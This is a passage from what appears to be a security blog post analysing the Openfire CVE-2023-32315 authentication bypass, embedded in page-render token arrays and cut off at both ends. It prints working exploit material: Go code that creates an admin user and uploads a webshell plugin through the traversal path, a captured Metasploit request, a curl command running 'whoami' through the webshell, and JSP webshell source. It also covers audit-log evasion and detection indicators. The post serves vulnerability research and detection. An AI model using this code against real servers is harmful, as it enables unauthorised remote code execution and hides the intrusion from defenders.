return\n}\n",[886,90112,90113,90129,90144,90148,90295,90320,90324,90382,90386,90431,90443,90457,90462],{"__ignoreMap":219},[1373,90114,90115,90118,90120,90123,90125,90127],{"class":1375,"line":1376},[1373,90116,90117],{"class":4640},"username ",[1373,90119,20584],{"class":1397},[1373,90121,90122],{"class":7297}," generateRandomString",[1373,90124,1384],{"class":1383},[1373,90126,356],{"class":5467},[1373,90128,11875],{"class":1383},[1373,90130,90131,90134,90136,90138,90140,90142],{"class":1375,"line":220},[1373,90132,90133],{"class":4640},"password ",[1373,90135,20584],{"class":1397},[1373,90137,90122],{"class":7297},[1373,90139,1384],{"class":1383},[1373,90141,356],{"class":5467},[1373,90143,11875],{"class":1383},[1373,90145,90146],{"class":1375,"line":1266},[1373,90147,6520],{"emptyLinePlaceholder":237},[1373,90149,90150,90153,90155,90157,90159,90161,90163,90165,90167,90170,90173,90176,90178,90181,90183,90185,90187,90190,90192,90195,90197,90200,90202,90205,90207,90210,90212,90215,90217,90220,90222,90225,90227,90229,90231,90234,90236,90239,90241,90244,90246,90248,90250,90253,90255,90258,90260,90262,90264,90267,90269,90271,90274,90276,90279,90281,90284,90286,90289,90291,90293],{"class":1375,"line":1852},[1373,90151,90152],{"class":4640},"createUserUrl ",[1373,90154,20584],{"class":1397},[1373,90156,82848],{"class":4640},[1373,90158,59],{"class":1383},[1373,90160,82853],{"class":7297},[1373,90162,1384],{"class":1383},[1373,90164,183],{"class":1387},[1373,90166,38048],{"class":37971},[1373,90168,90169],{"class":1391},"\u002Fsetup\u002Fsetup-s\u002F",[1373,90171,90172],{"class":37971},"%%",[1373,90174,90175],{"class":1391},"u002e",[1373,90177,90172],{"class":37971},[1373,90179,90180],{"class":1391},"u002e\u002F",[1373,90182,90172],{"class":37971},[1373,90184,90175],{"class":1391},[1373,90186,90172],{"class":37971},[1373,90188,90189],{"class":1391},"u002e\u002Fuser-create.jsp?csrf=",[1373,90191,38048],{"class":37971},[1373,90193,90194],{"class":1391},"&username=",[1373,90196,38048],{"class":37971},[1373,90198,90199],{"class":1391},"&name=&email=&password=",[1373,90201,38048],{"class":37971},[1373,90203,90204],{"class":1391},"&passwordConfirm=",[1373,90206,38048],{"class":37971},[1373,90208,90209],{"class":1391},"&isadmin=on&create=",[1373,90211,90172],{"class":37971},[1373,90213,90214],{"class":1391},"E5",[1373,90216,90172],{"class":37971},[1373,90218,90219],{"class":1391},"88",[1373,90221,90172],{"class":37971},[1373,90223,90224],{"class":1391},"9B",[1373,90226,90172],{"class":37971},[1373,90228,90214],{"class":1391},[1373,90230,90172],{"class":37971},[1373,90232,90233],{"class":1391},"BB",[1373,90235,90172],{"class":37971},[1373,90237,90238],{"class":1391},"BA",[1373,90240,90172],{"class":37971},[1373,90242,90243],{"class":1391},"E7",[1373,90245,90172],{"class":37971},[1373,90247,36855],{"class":1391},[1373,90249,90172],{"class":37971},[1373,90251,90252],{"class":1391},"A8",[1373,90254,90172],{"class":37971},[1373,90256,90257],{"class":1391},"E6",[1373,90259,90172],{"class":37971},[1373,90261,90219],{"class":1391},[1373,90263,90172],{"class":37971},[1373,90265,90266],{"class":1391},"B7",[1373,90268,183],{"class":1387},[1373,90270,5437],{"class":1383},[1373,90272,90273],{"class":4640}," t",[1373,90275,5437],{"class":1383},[1373,90277,90278],{"class":4640}," csrf",[1373,90280,5437],{"class":1383},[1373,90282,90283],{"class":4640}," username",[1373,90285,5437],{"class":1383},[1373,90287,90288],{"class":4640}," password",[1373,90290,5437],{"class":1383},[1373,90292,90288],{"class":4640},[1373,90294,11875],{"class":1383},[1373,90296,90297,90299,90301,90304,90306,90309,90311,90313,90315,90318],{"class":1375,"line":4692},[1373,90298,47190],{"class":4640},[1373,90300,5437],{"class":1383},[1373,90302,90303],{"class":4640}," err ",[1373,90305,5417],{"class":1397},[1373,90307,90308],{"class":4640}," rawhttp",[1373,90310,59],{"class":1383},[1373,90312,16869],{"class":7297},[1373,90314,1384],{"class":1383},[1373,90316,90317],{"class":4640},"createUserUrl",[1373,90319,11875],{"class":1383},[1373,90321,90322],{"class":1375,"line":4724},[1373,90323,6520],{"emptyLinePlaceholder":237},[1373,90325,90326,90329,90331,90334,90336,90338,90341,90343,90345,90347,90349,90351,90353,90355,90357,90360,90362,90364,90367,90369,90371,90374,90376,90378,90380],{"class":1375,"line":4756},[1373,90327,90328],{"class":4640},"m ",[1373,90330,20584],{"class":1397},[1373,90332,90333],{"class":1397}," map",[1373,90335,7035],{"class":1383},[1373,90337,15752],{"class":7293},[1373,90339,90340],{"class":1383},"][]",[1373,90342,15752],{"class":7293},[1373,90344,9149],{"class":1383},[1373,90346,183],{"class":1387},[1373,90348,6565],{"class":1391},[1373,90350,183],{"class":1387},[1373,90352,4606],{"class":1383},[1373,90354,5420],{"class":1383},[1373,90356,183],{"class":1387},[1373,90358,90359],{"class":1391},"JSESSIONID=",[1373,90361,183],{"class":1387},[1373,90363,15478],{"class":1397},[1373,90365,90366],{"class":4640}," jsessionid",[1373,90368,5437],{"class":1383},[1373,90370,4883],{"class":1387},[1373,90372,90373],{"class":1391},"csrf=",[1373,90375,183],{"class":1387},[1373,90377,15478],{"class":1397},[1373,90379,90278],{"class":4640},[1373,90381,9238],{"class":1383},[1373,90383,90384],{"class":1375,"line":4768},[1373,90385,6520],{"emptyLinePlaceholder":237},[1373,90387,90388,90390,90392,90394,90396,90398,90400,90403,90405,90407,90409,90411,90413,90416,90418,90420,90422,90425,90427,90429],{"class":1375,"line":4792},[1373,90389,47190],{"class":4640},[1373,90391,5437],{"class":1383},[1373,90393,90303],{"class":4640},[1373,90395,5417],{"class":1397},[1373,90397,90308],{"class":4640},[1373,90399,59],{"class":1383},[1373,90401,90402],{"class":7297},"DoRaw",[1373,90404,1384],{"class":1383},[1373,90406,183],{"class":1387},[1373,90408,6284],{"class":1391},[1373,90410,183],{"class":1387},[1373,90412,5437],{"class":1383},[1373,90414,90415],{"class":4640}," createUserUrl",[1373,90417,5437],{"class":1383},[1373,90419,16579],{"class":1387},[1373,90421,5437],{"class":1383},[1373,90423,90424],{"class":4640}," m",[1373,90426,5437],{"class":1383},[1373,90428,19247],{"class":7054},[1373,90430,11875],{"class":1383},[1373,90432,90433,90435,90437,90439,90441],{"class":1375,"line":4798},[1373,90434,4637],{"class":4636},[1373,90436,90303],{"class":4640},[1373,90438,15677],{"class":1397},[1373,90440,19247],{"class":7054},[1373,90442,4765],{"class":1383},[1373,90444,90445,90447,90449,90451,90453,90455],{"class":1375,"line":4806},[1373,90446,82848],{"class":4640},[1373,90448,59],{"class":1383},[1373,90450,19134],{"class":7297},[1373,90452,1384],{"class":1383},[1373,90454,28065],{"class":4640},[1373,90456,11875],{"class":1383},[1373,90458,90459],{"class":1375,"line":4817},[1373,90460,90461],{"class":4636}," return\n",[1373,90463,90464],{"class":1375,"line":4825},[1373,90465,1855],{"class":1383},[18,90467,85572,90468,90471],{},[886,90469,90470],{},"create="," is followed by a bunch of URL encoded characters. They translate to 创建用户or “create user”. For detection purposes, it’s important to know this isn’t a reliable value, as OpenFire supports a variety of languages. For example, Metasploit sends this exact same admin creation request, but it’s slightly different. Here is Metasploit’s request on the wire (these requests can be POST requests, but both implementations opted for GET for whatever reason):",[1354,90473,90476],{"className":90474,"code":90475,"language":1359},[1357],"GET \u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fuser-create.jsp?csrf=5QQN6JwEVq9LIW1&username=hqvvvarefibpfx&password=Qm7y4eZgU9&passwordConfirm=Qm7y4eZgU9&isadmin=on&create=Create%2bUser HTTP\u002F1.1\nHost: 10.9.49.143:9090\nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 16_5 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F16.5 Mobile\u002F15E148 Safari\u002F604.1\nCookie: JSESSIONID=node06x26aqm77cqelg1crrhtstts10.node0; csrf=5QQN6JwEVq9LIW1\nContent-Type: application\u002Fx-www-form-urlencoded\n",[886,90477,90475],{"__ignoreMap":219},[18,90479,90480],{},"These exploits are creating an admin user to gain access to the Openfire Plugins interface. The plugin system allows administrators to add, more or less, arbitrary functionality to Openfire via uploaded Java JARs.",[18,90482,90483],{},[68,90484],{":width":10862,"alt":90485,"src":90486},"Openfire plugins page","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fopenfire-plugins.png",[18,90488,90489],{},"This is, very obviously, a place to transition from authentication bypass to remote code execution.",[18,90491,90492],{},"The tangxiaofeng7 exploit repository contains an Openfire plugin with a JSP webshell. Once the attacker has created administrative credentials, they can log in, upload tangxiaofeng7’s plugin, and gain access to a webshell. Similarly, the Metasploit module’s plugin is uploaded but initiates a reverse shell instead of a webshell.",[18,90494,90495,90496,90501],{},"Real-world attackers have followed this approach as well. For example, we know the Kinsing botnet likely followed this approach based on ",[47,90497,90500],{"href":90498,"rel":90499},"https:\u002F\u002Fdiscourse.igniterealtime.org\u002Ft\u002Fcve-2023-32315-openfire-administration-console-authentication-bypass\u002F92869\u002F15",[51],"comments"," from the Ignite Realtime forums.",[18,90503,90504,90505,90510],{},"Fortunately for defenders, the admin user creation is noisy. Another user on the forum ",[47,90506,90509],{"href":90507,"rel":90508},"https:\u002F\u002Fdiscourse.igniterealtime.org\u002Ft\u002Fcve-2023-32315-openfire-administration-console-authentication-bypass\u002F92869\u002F5",[51],"posted"," the Openfire security audit log after they’d been exploited (note that the audit log doesn’t disappear just because the system log file has been deleted):",[18,90512,90513],{},[68,90514],{":width":10862,"alt":90515,"src":90516},"Openfire security audit log after exploitation","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fsecurity-audit-log.png",[18,90518,90519,90520,90523,90524,90526,90527,90530,90531,90534,90535,90538],{},"Unfortunately for defenders, attackers don’t need to create a user or authenticate to upload a plugin. CVE-2023-32315 gives the attacker access to ",[886,90521,90522],{},"plugin-admin.jsp",", just as it gives the attacker access to ",[886,90525,90100],{},". So when we wrote our exploit, we opted for a user-less approach. We extracted a ",[886,90528,90529],{},"JSESSIONID"," and CSRF token from ",[886,90532,90533],{},"\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugin-admin.jsp"," and then executed the following logic from our ",[47,90536,20558],{"href":14297,"rel":90537},[51],"-based exploit:",[1354,90540,90542],{"className":19022,"code":90541,"language":19024,"meta":219,"style":219},"func uploadWebshell(conf *config.Config, token string, session string) bool {\n \u002F\u002F webshell is uploaded as a multipart upload\n var multipartFile bytes.Buffer\n writer := multipart.NewWriter(&multipartFile)\n header := make(textproto.MIMEHeader)\n header.Set(\"Content-Disposition\", `form-data; name=\"uploadfile\"; filename=\"exampleplugin.jar\"`)\n header.Set(\"Content-Type\", \"application\u002Fx-java-archive\")\n\n \u002F\u002F copy the webshell into the writer\n filedata, _ := writer.CreatePart(header)\n _, _ = io.Copy(filedata, strings.NewReader(webshell))\n writer.Close()\n\n \u002F\u002F upload it\n headers := map[string]string{\n \"Cookie\": fmt.Sprintf(\"JSESSIONID=%s;csrf=%s\", session, token),\n \"Content-Type\": writer.FormDataContentType(),\n }\n\n \u002F\u002F create a normal request. Go does not like the %u in their standard req, so create a\n \u002F\u002F normal request and then insert the malformed URI into the URL struct\n url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, \"\u002F\")\n client, req, err := protocol.CreateRequest(\"POST\", url, multipartFile.String(), false)\n if err {\n return false\n }\n\n req.URL.Opaque = \"\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugin-admin.jsp?uploadplugin&csrf=\" + token\n\n protocol.SetRequestHeaders(req, headers)\n resp, _, ok := protocol.DoRequest(client, req)\n if !ok {\n return false\n }\n if resp.StatusCode != 500 {\n output.PrintfError(\"Expected 500 response: %d\", resp.StatusCode)\n\n return false\n }\n\n return true\n}\n",[886,90543,90544,90582,90587,90603,90627,90649,90679,90706,90710,90715,90742,90782,90794,90798,90803,90822,90863,90883,90887,90891,90896,90901,90947,90997,91005,91011,91015,91019,91047,91051,91072,91105,91115,91121,91125,91141,91170,91174,91180,91184,91188,91194],{"__ignoreMap":219},[1373,90545,90546,90548,90551,90553,90555,90557,90559,90561,90563,90565,90568,90570,90572,90574,90576,90578,90580],{"class":1375,"line":1376},[1373,90547,19088],{"class":1397},[1373,90549,90550],{"class":7297}," uploadWebshell",[1373,90552,1384],{"class":1383},[1373,90554,38107],{"class":19096},[1373,90556,19113],{"class":1397},[1373,90558,38112],{"class":14938},[1373,90560,59],{"class":1383},[1373,90562,38117],{"class":14938},[1373,90564,5437],{"class":1383},[1373,90566,90567],{"class":19096}," token",[1373,90569,15757],{"class":7293},[1373,90571,5437],{"class":1383},[1373,90573,4521],{"class":19096},[1373,90575,15757],{"class":7293},[1373,90577,2230],{"class":1383},[1373,90579,16303],{"class":7293},[1373,90581,4765],{"class":1383},[1373,90583,90584],{"class":1375,"line":220},[1373,90585,90586],{"class":4630}," \u002F\u002F webshell is uploaded as a multipart upload\n",[1373,90588,90589,90592,90595,90598,90600],{"class":1375,"line":1266},[1373,90590,90591],{"class":1397}," var",[1373,90593,90594],{"class":4640}," multipartFile ",[1373,90596,90597],{"class":14938},"bytes",[1373,90599,59],{"class":1383},[1373,90601,90602],{"class":14938},"Buffer\n",[1373,90604,90605,90608,90610,90613,90615,90618,90620,90622,90625],{"class":1375,"line":1852},[1373,90606,90607],{"class":4640}," writer ",[1373,90609,20584],{"class":1397},[1373,90611,90612],{"class":4640}," multipart",[1373,90614,59],{"class":1383},[1373,90616,90617],{"class":7297},"NewWriter",[1373,90619,1384],{"class":1383},[1373,90621,7218],{"class":1397},[1373,90623,90624],{"class":4640},"multipartFile",[1373,90626,11875],{"class":1383},[1373,90628,90629,90632,90634,90637,90639,90642,90644,90647],{"class":1375,"line":4692},[1373,90630,90631],{"class":4640}," header ",[1373,90633,20584],{"class":1397},[1373,90635,90636],{"class":7297}," make",[1373,90638,1384],{"class":1383},[1373,90640,90641],{"class":14938},"textproto",[1373,90643,59],{"class":1383},[1373,90645,90646],{"class":14938},"MIMEHeader",[1373,90648,11875],{"class":1383},[1373,90650,90651,90654,90656,90659,90661,90663,90666,90668,90670,90672,90675,90677],{"class":1375,"line":4724},[1373,90652,90653],{"class":4640}," header",[1373,90655,59],{"class":1383},[1373,90657,90658],{"class":7297},"Set",[1373,90660,1384],{"class":1383},[1373,90662,183],{"class":1387},[1373,90664,90665],{"class":1391},"Content-Disposition",[1373,90667,183],{"class":1387},[1373,90669,5437],{"class":1383},[1373,90671,19163],{"class":1387},[1373,90673,90674],{"class":1391},"form-data; name=\"uploadfile\"; filename=\"exampleplugin.jar\"",[1373,90676,19169],{"class":1387},[1373,90678,11875],{"class":1383},[1373,90680,90681,90683,90685,90687,90689,90691,90693,90695,90697,90699,90702,90704],{"class":1375,"line":4756},[1373,90682,90653],{"class":4640},[1373,90684,59],{"class":1383},[1373,90686,90658],{"class":7297},[1373,90688,1384],{"class":1383},[1373,90690,183],{"class":1387},[1373,90692,6391],{"class":1391},[1373,90694,183],{"class":1387},[1373,90696,5437],{"class":1383},[1373,90698,4883],{"class":1387},[1373,90700,90701],{"class":1391},"application\u002Fx-java-archive",[1373,90703,183],{"class":1387},[1373,90705,11875],{"class":1383},[1373,90707,90708],{"class":1375,"line":4768},[1373,90709,6520],{"emptyLinePlaceholder":237},[1373,90711,90712],{"class":1375,"line":4792},[1373,90713,90714],{"class":4630}," \u002F\u002F copy the webshell into the writer\n",[1373,90716,90717,90720,90722,90725,90727,90730,90732,90735,90737,90740],{"class":1375,"line":4798},[1373,90718,90719],{"class":4640}," filedata",[1373,90721,5437],{"class":1383},[1373,90723,90724],{"class":4640}," _ ",[1373,90726,20584],{"class":1397},[1373,90728,90729],{"class":4640}," writer",[1373,90731,59],{"class":1383},[1373,90733,90734],{"class":7297},"CreatePart",[1373,90736,1384],{"class":1383},[1373,90738,90739],{"class":4640},"header",[1373,90741,11875],{"class":1383},[1373,90743,90744,90747,90749,90751,90753,90756,90758,90761,90763,90766,90768,90771,90773,90776,90778,90780],{"class":1375,"line":4806},[1373,90745,90746],{"class":4640}," _",[1373,90748,5437],{"class":1383},[1373,90750,90724],{"class":4640},[1373,90752,5417],{"class":1397},[1373,90754,90755],{"class":4640}," io",[1373,90757,59],{"class":1383},[1373,90759,90760],{"class":7297},"Copy",[1373,90762,1384],{"class":1383},[1373,90764,90765],{"class":4640},"filedata",[1373,90767,5437],{"class":1383},[1373,90769,90770],{"class":4640}," strings",[1373,90772,59],{"class":1383},[1373,90774,90775],{"class":7297},"NewReader",[1373,90777,1384],{"class":1383},[1373,90779,22748],{"class":4640},[1373,90781,16761],{"class":1383},[1373,90783,90784,90787,90789,90792],{"class":1375,"line":4817},[1373,90785,90786],{"class":4640}," writer",[1373,90788,59],{"class":1383},[1373,90790,90791],{"class":7297},"Close",[1373,90793,27326],{"class":1383},[1373,90795,90796],{"class":1375,"line":4825},[1373,90797,6520],{"emptyLinePlaceholder":237},[1373,90799,90800],{"class":1375,"line":4835},[1373,90801,90802],{"class":4630}," \u002F\u002F upload it\n",[1373,90804,90805,90808,90810,90812,90814,90816,90818,90820],{"class":1375,"line":4843},[1373,90806,90807],{"class":4640}," headers ",[1373,90809,20584],{"class":1397},[1373,90811,90333],{"class":1397},[1373,90813,7035],{"class":1383},[1373,90815,15752],{"class":7293},[1373,90817,15050],{"class":1383},[1373,90819,15752],{"class":7293},[1373,90821,8904],{"class":1383},[1373,90823,90824,90826,90828,90830,90832,90834,90836,90838,90840,90842,90844,90846,90849,90851,90853,90855,90857,90859,90861],{"class":1375,"line":4849},[1373,90825,28414],{"class":1387},[1373,90827,6565],{"class":1391},[1373,90829,183],{"class":1387},[1373,90831,4606],{"class":1383},[1373,90833,19129],{"class":4640},[1373,90835,59],{"class":1383},[1373,90837,82853],{"class":7297},[1373,90839,1384],{"class":1383},[1373,90841,183],{"class":1387},[1373,90843,90359],{"class":1391},[1373,90845,38048],{"class":37971},[1373,90847,90848],{"class":1391},";csrf=",[1373,90850,38048],{"class":37971},[1373,90852,183],{"class":1387},[1373,90854,5437],{"class":1383},[1373,90856,4521],{"class":4640},[1373,90858,5437],{"class":1383},[1373,90860,90567],{"class":4640},[1373,90862,17933],{"class":1383},[1373,90864,90865,90867,90869,90871,90873,90875,90877,90880],{"class":1375,"line":4877},[1373,90866,28414],{"class":1387},[1373,90868,6391],{"class":1391},[1373,90870,183],{"class":1387},[1373,90872,4606],{"class":1383},[1373,90874,90729],{"class":4640},[1373,90876,59],{"class":1383},[1373,90878,90879],{"class":7297},"FormDataContentType",[1373,90881,90882],{"class":1383},"(),\n",[1373,90884,90885],{"class":1375,"line":4915},[1373,90886,4795],{"class":1383},[1373,90888,90889],{"class":1375,"line":4931},[1373,90890,6520],{"emptyLinePlaceholder":237},[1373,90892,90893],{"class":1375,"line":4947},[1373,90894,90895],{"class":4630}," \u002F\u002F create a normal request. Go does not like the %u in their standard req, so create a\n",[1373,90897,90898],{"class":1375,"line":4952},[1373,90899,90900],{"class":4630}," \u002F\u002F normal request and then insert the malformed URI into the URL struct\n",[1373,90902,90903,90905,90907,90909,90911,90913,90915,90917,90919,90921,90923,90925,90927,90929,90931,90933,90935,90937,90939,90941,90943,90945],{"class":1375,"line":6776},[1373,90904,38128],{"class":4640},[1373,90906,20584],{"class":1397},[1373,90908,20615],{"class":4640},[1373,90910,59],{"class":1383},[1373,90912,20638],{"class":7297},[1373,90914,1384],{"class":1383},[1373,90916,38107],{"class":4640},[1373,90918,59],{"class":1383},[1373,90920,38145],{"class":4640},[1373,90922,5437],{"class":1383},[1373,90924,20633],{"class":4640},[1373,90926,59],{"class":1383},[1373,90928,38154],{"class":4640},[1373,90930,5437],{"class":1383},[1373,90932,20633],{"class":4640},[1373,90934,59],{"class":1383},[1373,90936,38163],{"class":4640},[1373,90938,5437],{"class":1383},[1373,90940,4883],{"class":1387},[1373,90942,2180],{"class":1391},[1373,90944,183],{"class":1387},[1373,90946,11875],{"class":1383},[1373,90948,90949,90952,90954,90957,90959,90961,90963,90965,90967,90970,90972,90974,90976,90978,90980,90982,90984,90987,90989,90991,90993,90995],{"class":1375,"line":6781},[1373,90950,90951],{"class":4640}," client",[1373,90953,5437],{"class":1383},[1373,90955,90956],{"class":4640}," req",[1373,90958,5437],{"class":1383},[1373,90960,90303],{"class":4640},[1373,90962,20584],{"class":1397},[1373,90964,20615],{"class":4640},[1373,90966,59],{"class":1383},[1373,90968,90969],{"class":7297},"CreateRequest",[1373,90971,1384],{"class":1383},[1373,90973,183],{"class":1387},[1373,90975,6946],{"class":1391},[1373,90977,183],{"class":1387},[1373,90979,5437],{"class":1383},[1373,90981,37890],{"class":4640},[1373,90983,5437],{"class":1383},[1373,90985,90986],{"class":4640}," multipartFile",[1373,90988,59],{"class":1383},[1373,90990,27524],{"class":7297},[1373,90992,18929],{"class":1383},[1373,90994,16311],{"class":14985},[1373,90996,11875],{"class":1383},[1373,90998,90999,91001,91003],{"class":1375,"line":7524},[1373,91000,4695],{"class":4636},[1373,91002,90303],{"class":4640},[1373,91004,8904],{"class":1383},[1373,91006,91007,91009],{"class":1375,"line":7530},[1373,91008,4918],{"class":4636},[1373,91010,16195],{"class":14985},[1373,91012,91013],{"class":1375,"line":7546},[1373,91014,4795],{"class":1383},[1373,91016,91017],{"class":1375,"line":7571},[1373,91018,6520],{"emptyLinePlaceholder":237},[1373,91020,91021,91024,91026,91028,91030,91033,91035,91037,91040,91042,91044],{"class":1375,"line":7598},[1373,91022,91023],{"class":4640}," req",[1373,91025,59],{"class":1383},[1373,91027,2170],{"class":4640},[1373,91029,59],{"class":1383},[1373,91031,91032],{"class":4640},"Opaque ",[1373,91034,5417],{"class":1397},[1373,91036,4883],{"class":1387},[1373,91038,91039],{"class":1391},"\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugin-admin.jsp?uploadplugin&csrf=",[1373,91041,183],{"class":1387},[1373,91043,15478],{"class":1397},[1373,91045,91046],{"class":4640}," token\n",[1373,91048,91049],{"class":1375,"line":7615},[1373,91050,6520],{"emptyLinePlaceholder":237},[1373,91052,91053,91056,91058,91061,91063,91066,91068,91070],{"class":1375,"line":7635},[1373,91054,91055],{"class":4640}," protocol",[1373,91057,59],{"class":1383},[1373,91059,91060],{"class":7297},"SetRequestHeaders",[1373,91062,1384],{"class":1383},[1373,91064,91065],{"class":4640},"req",[1373,91067,5437],{"class":1383},[1373,91069,20906],{"class":4640},[1373,91071,11875],{"class":1383},[1373,91073,91074,91076,91078,91081,91083,91085,91087,91089,91091,91094,91096,91099,91101,91103],{"class":1375,"line":7640},[1373,91075,37858],{"class":4640},[1373,91077,5437],{"class":1383},[1373,91079,91080],{"class":4640}," _",[1373,91082,5437],{"class":1383},[1373,91084,20610],{"class":4640},[1373,91086,20584],{"class":1397},[1373,91088,20615],{"class":4640},[1373,91090,59],{"class":1383},[1373,91092,91093],{"class":7297},"DoRequest",[1373,91095,1384],{"class":1383},[1373,91097,91098],{"class":4640},"client",[1373,91100,5437],{"class":1383},[1373,91102,90956],{"class":4640},[1373,91104,11875],{"class":1383},[1373,91106,91107,91109,91111,91113],{"class":1375,"line":7648},[1373,91108,4695],{"class":4636},[1373,91110,7370],{"class":1397},[1373,91112,20662],{"class":4640},[1373,91114,8904],{"class":1383},[1373,91116,91117,91119],{"class":1375,"line":7672},[1373,91118,4918],{"class":4636},[1373,91120,16195],{"class":14985},[1373,91122,91123],{"class":1375,"line":7688},[1373,91124,4795],{"class":1383},[1373,91126,91127,91129,91131,91133,91135,91137,91139],{"class":1375,"line":7709},[1373,91128,4695],{"class":4636},[1373,91130,37927],{"class":4640},[1373,91132,59],{"class":1383},[1373,91134,37932],{"class":4640},[1373,91136,15677],{"class":1397},[1373,91138,37949],{"class":5467},[1373,91140,4765],{"class":1383},[1373,91142,91143,91145,91147,91149,91151,91153,91156,91158,91160,91162,91164,91166,91168],{"class":1375,"line":7714},[1373,91144,37956],{"class":4640},[1373,91146,59],{"class":1383},[1373,91148,37961],{"class":7297},[1373,91150,1384],{"class":1383},[1373,91152,183],{"class":1387},[1373,91154,91155],{"class":1391},"Expected 500 response: ",[1373,91157,37972],{"class":37971},[1373,91159,183],{"class":1387},[1373,91161,5437],{"class":1383},[1373,91163,37927],{"class":4640},[1373,91165,59],{"class":1383},[1373,91167,37983],{"class":4640},[1373,91169,11875],{"class":1383},[1373,91171,91172],{"class":1375,"line":7722},[1373,91173,6520],{"emptyLinePlaceholder":237},[1373,91175,91176,91178],{"class":1375,"line":9903},[1373,91177,4918],{"class":4636},[1373,91179,16195],{"class":14985},[1373,91181,91182],{"class":1375,"line":9908},[1373,91183,4795],{"class":1383},[1373,91185,91186],{"class":1375,"line":9913},[1373,91187,6520],{"emptyLinePlaceholder":237},[1373,91189,91190,91192],{"class":1375,"line":9932},[1373,91191,7340],{"class":4636},[1373,91193,38077],{"class":14985},[1373,91195,91196],{"class":1375,"line":9937},[1373,91197,1855],{"class":1383},[18,91199,91200,91201,91204],{},"As you can see, we are just uploading the plugin JAR via a POST request (and working around a bit of Go-foolishness associated with the ",[886,91202,91203],{},"%u002e"," in the URI). Without authentication, the plugin is accepted and installed. The webshell can then be accessed, without authentication, using the traversal. For example:",[1354,91206,91208],{"className":31740,"code":91207,"language":2186,"meta":219,"style":219},"curl -v \"http:\u002F\u002F10.9.49.143:9090\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=whoami\"\n",[886,91209,91210],{"__ignoreMap":219},[1373,91211,91212,91214,91216,91218,91221],{"class":1375,"line":1376},[1373,91213,1557],{"class":2206},[1373,91215,45584],{"class":2209},[1373,91217,4883],{"class":1387},[1373,91219,91220],{"class":1391},"http:\u002F\u002F10.9.49.143:9090\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=whoami",[1373,91222,19057],{"class":1387},[18,91224,91225,91226,91229],{},"This approach keeps login attempts out of the security audit log and prevents the “uploaded plugin” notification from being recorded. That’s a pretty big deal because it leaves ",[295,91227,91228],{},"no evidence"," in the security audit log. For example, this is the security audit log for a system we exploited:",[18,91231,91232],{},[68,91233],{":width":10862,"alt":91234,"src":91235},"Empty Openfire security audit log after exploitation","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fempty-log.png",[18,91237,91238],{},"As you can see, there is absolutely nothing to indicate anything is amiss.",[18,91240,91241,91242,91245],{},"The actual openfire.log file tells a different story (depending on your installation, it may be found at ",[886,91243,91244],{},"\u002Fmnt\u002Fopenfire\u002Flogs\u002Fopenfire.log","). You can find these important indicators in this log file:",[1925,91247,91248],{},[18,91249,91250,91251,91254],{},"2023.08.18 17:19:49 [33mWARN [m ",[1373,91252,91253],{},"Jetty-QTP-AdminConsole-39",": org.eclipse.jetty.server.handler.ContextHandler.ROOT - Unhandled exception occurred whilst decorating page\njava.lang.NullPointerException: Cannot invoke \"org.jivesoftware.openfire.user.User.getUsername()\" because the return value of \"org.jivesoftware.util.WebManager.getUser()\" is null",[1925,91256,91257],{},[18,91258,91250,91259,91261],{},[1373,91260,91253],{},": org.eclipse.jetty.server.HttpChannel - \u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugin-admin.jsp\njava.lang.NullPointerException: Cannot invoke \"org.jivesoftware.openfire.user.User.getUsername()\" because the return value of \"org.jivesoftware.util.WebManager.getUser()\" is null",[18,91263,91264],{},"Unfortunately, an attacker could use the path traversal to delete the log file. Depending on the permissions of the Openfire user, the attacker might be able to delete the log file via the webshell\u002Freverse shell,which leaves the plugin itself as the only artifact that indicates exploitation. This is why it's important to know how one is crafted when analyzing a system that might have been exploited.",[18,91266,91267,91268,91273,91274,91277],{},"We were very lazy when crafting our plugin. We just used the ",[47,91269,91272],{"href":91270,"rel":91271},"https:\u002F\u002Fgithub.com\u002Figniterealtime\u002Fopenfire-exampleplugin",[51],"Openfire example plugin",". The only modification we made was to ",[886,91275,91276],{},"\u002Fsrc\u002Fmain\u002Fweb\u002Fexampleplugin-page.jsp"," when we changed the JSP into a very simple webshell (with a weird X-Header that we’ll touch on later).",[1354,91279,91281],{"className":27194,"code":91280,"language":27196,"meta":219,"style":219},"\u003C%\nString cmd = request.getParameter(\"cmd\");\nif ( cmd != null) {\n java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream());\n String line = in.readLine();\n if (line != null) {\n response.setHeader(\"X-Error\", line);\n }\n} %>\n",[886,91282,91283,91288,91312,91328,91382,91400,91417,91443,91447],{"__ignoreMap":219},[1373,91284,91285],{"class":1375,"line":1376},[1373,91286,91287],{"class":1397},"\u003C%\n",[1373,91289,91290,91292,91294,91296,91298,91300,91302,91304,91306,91308,91310],{"class":1375,"line":220},[1373,91291,27524],{"class":27228},[1373,91293,75120],{"class":4640},[1373,91295,5417],{"class":1397},[1373,91297,75125],{"class":4640},[1373,91299,59],{"class":1383},[1373,91301,75130],{"class":7297},[1373,91303,1384],{"class":1383},[1373,91305,183],{"class":1387},[1373,91307,17653],{"class":1391},[1373,91309,183],{"class":1387},[1373,91311,4680],{"class":1383},[1373,91313,91314,91316,91318,91320,91322,91324,91326],{"class":1375,"line":1266},[1373,91315,4637],{"class":4636},[1373,91317,4641],{"class":1383},[1373,91319,75120],{"class":4640},[1373,91321,15677],{"class":1397},[1373,91323,15680],{"class":7054},[1373,91325,2230],{"class":1383},[1373,91327,4765],{"class":1383},[1373,91329,91330,91333,91335,91338,91340,91343,91345,913